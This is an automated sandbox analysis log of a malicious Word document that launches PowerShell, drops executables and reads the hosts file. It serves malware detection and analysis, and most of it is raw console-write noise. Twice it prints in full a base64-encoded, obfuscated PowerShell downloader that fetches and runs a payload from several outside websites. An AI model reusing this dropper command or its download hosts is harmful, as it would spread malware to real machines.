Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....p...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....p...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....p...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....p...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....p...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v.....&......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....p'..............................}..v.....'......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....p/..............................}..v...../......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'................!.j....@Ns.............................}..v.....6......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....'...............L!.j....p7..............................}..v.....7......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3................!.j....@Ns.............................}..v.....>......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....3...............L!.j....p?..............................}..v.....?......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?................!.j....@Ns.............................}..v.....F......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....?...............L!.j....pG..............................}..v.....G......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K................!.j....@Ns.............................}..v.....N......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....K...............L!.j....pO..............................}..v.....O......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W................!.j....@Ns.............................}..v.....V......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....W...............L!.j....pW..............................}..v.....W......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c................!.j....@Ns.............................}..v.....^......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....c...............L!.j....p_..............................}..v....._......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o................!.j....@Ns.............................}..v.....f......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....o...............L!.j....pg..............................}..v.....g......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{................!.j....@Ns.............................}..v.....n......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....{...............L!.j....po..............................}..v.....o......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v.....v......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....pw..............................}..v.....w......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v.....~......0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....p...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v.... .......0.......................b....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....................................}..v....X.......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v............0............................................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....................................}..v....8.......0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.....................!.j....@Ns.............................}..v............0.......................r....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....@...............................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............ ........!.j....@Ns.............................}..v....P.......0................Js............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................L!.j....................................}..v............0................Ks............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j.....RG.............................}..v....`9......0...............8.s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.G.E.N.U.S. . . . . . . . . . .:. .2.........}..v.....M......0.................s.....(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................l..j......>.............................}..v.....M......0.................s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.C.L.A.S.S. . . . . . . . . . .:. ._._.P.A.R.A.M.E.T.E.R.S...0.................s.....>....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................l..j....................................}..v.....S......0.................s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.S.U.P.E.R.C.L.A.S.S. . . . . .:. ...........}..v.....W......0.................s.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................l..j....................................}..v.... X......0.................s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.D.Y.N.A.S.T.Y. . . . . . . . .:. ._._.P.A.R.A.M.E.T.E.R.S...0.................s.....>....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................l..j....................................}..v....x^......0.................s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.R.E.L.P.A.T.H. . . . . . . . .:. ...........}..v.....b......0.................s.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................l..j....................................}..v.....b......0.................s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.P.R.O.P.E.R.T.Y._.C.O.U.N.T. .:. .2.........}..v.....h......0.................s.....(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................l..j....................................}..v.....h......0.................s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.D.E.R.I.V.A.T.I.O.N. . . . . .:. .{.}.......}..v.... n......0.................s.....*....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................l..j....................................}..v.....n......0.................s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.S.E.R.V.E.R. . . . . . . . . .:. ...........}..v....Hr......0.................s.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................l..j....................................}..v.....r......0.................s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.N.A.M.E.S.P.A.C.E. . . . . . .:. ...........}..v....pv......0.................s.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................l..j....................................}..v.....w......0.................s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............_._.P.A.T.H. . . . . . . . . . . .:. ...........}..v.....z......0.................s.....&....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................l..j....................................}..v....0{......0.................s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............P.r.o.c.e.s.s.I.d. . . . . . . . .:. .2.7.8.8...}..v............0.................s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................l..j....................................}..v....h.......0.................s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v............R.e.t.u.r.n.V.a.l.u.e. . . . . . .:. .0.........}..v............0.................s.....(....................... Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v....................l..j....................................}..v....p.......0.................s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....9...............................}..v............0...............8.s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....E...............................}..v............0.................s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.v.......................j....E...............................}..v....8!......0.................s............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\spopk\KBDFA.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: REP_YFTCM6TNB.doc Virustotal: Detection: 53%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -ENCOD JABYAGkAYwB4AGMAeAA5AD0AKAAoACcARwA3ACcAKwAnAHkAJwApACsAKAAnADAAJwArACcAZgB2ADIAJwApACkAOwAkAE4AdQBvAGUAMABiADQAPQAkAEUAagA4ADYAdQBhAG0AIAArACAAWwBjAGgAYQByAF0AKAAxACAAKwAgADEAIAArACAAMgAwACAAKwAgADEAMAAgACsAIAAxADAAKQAgACsAIAAkAEkANwBuAHYAMABjAGQAOwAkAEkAOQBoADIAMABmADIAPQAoACgAJwBQACcAKwAnAHIAXwAzADYAbAAnACkAKwAnADYAJwApADsAWwBzAHkAcwB0AGUAbQAuAGkAbwAuAGQAaQByAGUAYwB0AG8AcgB5AF0AOgA6ACIAQwByAGAARQBgAEEAdABFAGAAZABJAFIARQBDAFQAbwBgAFIAWQAiACgAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQAgACsAIAAoACgAKAAnAHcATwAnACsAJwA1ACcAKQArACgAJwBXAHQAJwArACcAMgBpACcAKQArACgAJwB4ACcAKwAnAHQAagB3ACcAKQArACgAJwBPACcAKwAnADUASAAnACsAJwBwACcAKwAnADYAbQBrAGcAaQB3ACcAKQArACcATwA1ACcAKQAgAC0AYwByAGUAUABMAGEAYwBlACAAIAAoACcAdwAnACsAJwBPADUAJwApACwAWwBDAEgAQQByAF0AOQAyACkAKQA7ACQAUgAzAGYAYgBqAG8AOAA9ACgAKAAnAFgAbgAnACsAJwBsACcAKQArACgAJwBoAGsAbQAnACsAJwBsACcAKQApADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBgAGMAYABVAFIASQB0AGAAeQBQAFIAYABvAFQATwBDAE8ATAAiACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgAiAFQAYABMAFMAMQAyACIAOwAkAFUAbAB4AGkAbgBhAGUAPQAoACgAJwBOACcAKwAnAHoAaQBjACcAKQArACgAJwBhAHUAJwArACcANgAnACkAKQA7ACQARgB2ADcAeQBfADQAcAAgAD0AIAAoACgAJwBBAHkAJwArACcAOAAnACkAKwAoACcAZwA5ACcAKwAnAGIAJwApACkAOwAkAFgAYQBrADUAdwA1AHUAPQAoACgAJwBIACcAKwAnAGcANQAwACcAKQArACcAdAB5ACcAKwAnAHgAJwApADsAJABSAHkAZQB0AHYAZgA1AD0AKAAnAEkAcwAnACsAKAAnAGwAJwArACcAZwB4ACcAKQArACcAcQBlACcAKQA7ACQAQwAwAGIAMwBvAGsAaQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwA2AHcAJwArACgAJwBsAFcAJwArACcAdAAyAGkAeAAnACkAKwAoACcAdABqADYAdwAnACsAJwBsAEgAcAAnACkAKwAnADYAJwArACgAJwBtAGsAJwArACcAZwBpACcAKQArACgAJwA2AHcAJwArACcAbAAnACkAKQAuACIAcgBlAFAAYABsAGEAYwBlACIAKAAoAFsAYwBoAEEAUgBdADUANAArAFsAYwBoAEEAUgBdADEAMQA5ACsAWwBjAGgAQQBSAF0AMQAwADgAKQAsACcAXAAnACkAKQArACQARgB2ADcAeQBfADQAcAArACgAKAAnAC4AZQAnACsAJwB4ACcAKQArACcAZQAnACkAOwAkAFQAagAxAGgAYwBnAHMAPQAoACgAJwBZACcAKwAnADIAMAAnACkAKwAoACcAOAAnACsAJwBoAHcAbAAnACkAKQA7ACQATwBfAGUAMABsAGwAOQA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAHQALgBXAEUAYgBDAEwAaQBFAG4AdAA7ACQAVABmAGgAawBpADkAbAA9ACgAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAOgAvAC8AdwAnACsAJwBpAHcAJwApACsAJwBpAGwAJwArACgAJwBkAGMAYQAnACsAJwByAGUALgBvAHIAZwAvACcAKwAnAHcAJwApACsAKAAnAHAAJwArACcALQBpAG4AYwBsAHUAZAAnACkAKwAnAGUAcwAnACsAJwAvACcAKwAnAFIAJwArACcAaQAnACsAJwAvACoAJwArACgAJwBoAHQAJwArACcAdABwACcAKQArACcAOgAvACcAKwAoACcALwBnACcAKwAnAHkAYQBuAGQAJwArACcAYQByAGIAJwArACcAYQAnACsAJwByAC4AYwBvAG0AJwApACsAKAAnAC8ARQBEACcAKwAnAFUALwAnACkAKwAoACcAdwAnACsAJwBCAHUAJwApACsAKAAnAGIATAByAEIALwAqACcAKwAnAGgAdAB0AHAAOgAvACcAKwAnAC8AZwAnACsAJwBpAGEAbgBuACcAKwAnAGEAJwApACsAJwBzACcAKwAoACcAcAAnACsAJwBzAHkAYwBoAGkAJwApACsAKAAnAGMAcwB0AHUAJwArACcAZABpACcAKwAnAG8ALgBjAG8AJwApACsAKAAnAG0ALwBjACcAKwAnAGcAJwApACsAKAAnAGkAJwArACcALQBiACcAKQArACgAJwBpAG4AJwArACcALwBBAEEASAAnACkAKwAoACcAcgAvACcAKwAn
Source: unknown Process created: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe
Source: unknown Process created: C:\Windows\SysWOW64\spopk\KBDFA.exe C:\Windows\SysWOW64\spopk\KBDFA.exe
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Process created: C:\Windows\SysWOW64\spopk\KBDFA.exe C:\Windows\SysWOW64\spopk\KBDFA.exe Jump to behavior
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Window found: window name: SysTabControl32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Users\BEAUREGARD\Videos\PwdChange_src\PwdChange\Release\PwdChange.pdb source: Ay8g9b.exe, 00000004.00000000.2095012302.0000000000427000.00000002.00020000.sdmp, KBDFA.exe, 00000005.00000000.2098862093.0000000000427000.00000002.00020000.sdmp, Ay8g9b.exe.2.dr

Data Obfuscation:

barindex
PowerShell case anomaly found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -ENCOD JABYAGkAYwB4AGMAeAA5AD0AKAAoACcARwA3ACcAKwAnAHkAJwApACsAKAAnADAAJwArACcAZgB2ADIAJwApACkAOwAkAE4AdQBvAGUAMABiADQAPQAkAEUAagA4ADYAdQBhAG0AIAArACAAWwBjAGgAYQByAF0AKAAxACAAKwAgADEAIAArACAAMgAwACAAKwAgADEAMAAgACsAIAAxADAAKQAgACsAIAAkAEkANwBuAHYAMABjAGQAOwAkAEkAOQBoADIAMABmADIAPQAoACgAJwBQACcAKwAnAHIAXwAzADYAbAAnACkAKwAnADYAJwApADsAWwBzAHkAcwB0AGUAbQAuAGkAbwAuAGQAaQByAGUAYwB0AG8AcgB5AF0AOgA6ACIAQwByAGAARQBgAEEAdABFAGAAZABJAFIARQBDAFQAbwBgAFIAWQAiACgAJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQAgACsAIAAoACgAKAAnAHcATwAnACsAJwA1ACcAKQArACgAJwBXAHQAJwArACcAMgBpACcAKQArACgAJwB4ACcAKwAnAHQAagB3ACcAKQArACgAJwBPACcAKwAnADUASAAnACsAJwBwACcAKwAnADYAbQBrAGcAaQB3ACcAKQArACcATwA1ACcAKQAgAC0AYwByAGUAUABMAGEAYwBlACAAIAAoACcAdwAnACsAJwBPADUAJwApACwAWwBDAEgAQQByAF0AOQAyACkAKQA7ACQAUgAzAGYAYgBqAG8AOAA9ACgAKAAnAFgAbgAnACsAJwBsACcAKQArACgAJwBoAGsAbQAnACsAJwBsACcAKQApADsAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMAZQBgAGMAYABVAFIASQB0AGAAeQBQAFIAYABvAFQATwBDAE8ATAAiACAAPQAgAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQBjAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgAiAFQAYABMAFMAMQAyACIAOwAkAFUAbAB4AGkAbgBhAGUAPQAoACgAJwBOACcAKwAnAHoAaQBjACcAKQArACgAJwBhAHUAJwArACcANgAnACkAKQA7ACQARgB2ADcAeQBfADQAcAAgAD0AIAAoACgAJwBBAHkAJwArACcAOAAnACkAKwAoACcAZwA5ACcAKwAnAGIAJwApACkAOwAkAFgAYQBrADUAdwA1AHUAPQAoACgAJwBIACcAKwAnAGcANQAwACcAKQArACcAdAB5ACcAKwAnAHgAJwApADsAJABSAHkAZQB0AHYAZgA1AD0AKAAnAEkAcwAnACsAKAAnAGwAJwArACcAZwB4ACcAKQArACcAcQBlACcAKQA7ACQAQwAwAGIAMwBvAGsAaQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAJwA2AHcAJwArACgAJwBsAFcAJwArACcAdAAyAGkAeAAnACkAKwAoACcAdABqADYAdwAnACsAJwBsAEgAcAAnACkAKwAnADYAJwArACgAJwBtAGsAJwArACcAZwBpACcAKQArACgAJwA2AHcAJwArACcAbAAnACkAKQAuACIAcgBlAFAAYABsAGEAYwBlACIAKAAoAFsAYwBoAEEAUgBdADUANAArAFsAYwBoAEEAUgBdADEAMQA5ACsAWwBjAGgAQQBSAF0AMQAwADgAKQAsACcAXAAnACkAKQArACQARgB2ADcAeQBfADQAcAArACgAKAAnAC4AZQAnACsAJwB4ACcAKQArACcAZQAnACkAOwAkAFQAagAxAGgAYwBnAHMAPQAoACgAJwBZACcAKwAnADIAMAAnACkAKwAoACcAOAAnACsAJwBoAHcAbAAnACkAKQA7ACQATwBfAGUAMABsAGwAOQA9AC4AKAAnAG4AZQAnACsAJwB3AC0AbwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAHQALgBXAEUAYgBDAEwAaQBFAG4AdAA7ACQAVABmAGgAawBpADkAbAA9ACgAJwBoACcAKwAoACcAdAB0ACcAKwAnAHAAOgAvAC8AdwAnACsAJwBpAHcAJwApACsAJwBpAGwAJwArACgAJwBkAGMAYQAnACsAJwByAGUALgBvAHIAZwAvACcAKwAnAHcAJwApACsAKAAnAHAAJwArACcALQBpAG4AYwBsAHUAZAAnACkAKwAnAGUAcwAnACsAJwAvACcAKwAnAFIAJwArACcAaQAnACsAJwAvACoAJwArACgAJwBoAHQAJwArACcAdABwACcAKQArACcAOgAvACcAKwAoACcALwBnACcAKwAnAHkAYQBuAGQAJwArACcAYQByAGIAJwArACcAYQAnACsAJwByAC4AYwBvAG0AJwApACsAKAAnAC8ARQBEACcAKwAnAFUALwAnACkAKwAoACcAdwAnACsAJwBCAHUAJwApACsAKAAnAGIATAByAEIALwAqACcAKwAnAGgAdAB0AHAAOgAvACcAKwAnAC8AZwAnACsAJwBpAGEAbgBuACcAKwAnAGEAJwApACsAJwBzACcAKwAoACcAcAAnACsAJwBzAHkAYwBoAGkAJwApACsAKAAnAGMAcwB0AHUAJwArACcAZABpACcAKwAnAG8ALgBjAG8AJwApACsAKAAnAG0ALwBjACcAKwAnAGcAJwApACsAKAAnAGkAJwArACcALQBiACcAKQArACgAJwBpAG4AJwArACcALwBBAEEASAAnACkAKwAoACcAcgAvACcAKwAn
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00418CC0 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 4_2_00418CC0
PE file contains an invalid checksum
Source: Ay8g9b.exe.2.dr Static PE information: real checksum: 0x5e854 should be: 0x65a24
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0041005B push ecx; ret 4_2_0041006E
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_004100D5 push ecx; ret 4_2_004100E8
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5C40 push ecx; mov dword ptr [esp], 00004180h 4_2_003C5C41
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5CA0 push ecx; mov dword ptr [esp], 0000ECEBh 4_2_003C5CA1
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5CF0 push ecx; mov dword ptr [esp], 0000DEB7h 4_2_003C5CF1
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5D50 push ecx; mov dword ptr [esp], 000097F2h 4_2_003C5D51
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5DB0 push ecx; mov dword ptr [esp], 0000F636h 4_2_003C5DB1
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5E10 push ecx; mov dword ptr [esp], 0000AF8Ah 4_2_003C5E11
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5E40 push ecx; mov dword ptr [esp], 00002B63h 4_2_003C5E41
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5E80 push ecx; mov dword ptr [esp], 00002BE4h 4_2_003C5E81
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5EF0 push ecx; mov dword ptr [esp], 000066B1h 4_2_003C5EF1
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5F50 push ecx; mov dword ptr [esp], 00000282h 4_2_003C5F51
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_003C5F90 push ecx; mov dword ptr [esp], 0000765Fh 4_2_003C5F91
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028783E push ecx; mov dword ptr [esp], 0000ECEBh 4_2_0028783F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028788E push ecx; mov dword ptr [esp], 0000DEB7h 4_2_0028788F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002878EE push ecx; mov dword ptr [esp], 000097F2h 4_2_002878EF
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_0028794E push ecx; mov dword ptr [esp], 0000F636h 4_2_0028794F
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002879AE push ecx; mov dword ptr [esp], 0000AF8Ah 4_2_002879AF
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_002879DE push ecx; mov dword ptr [esp], 00002B63h 4_2_002879DF
Source: C:\Users\user\Wt2ixtj\Hp6mkgi\Ay8g9b.exe Code function: 4_2_00287A1E push ecx; mov dword ptr [esp], 00002BE4h 4_2_00287A1F
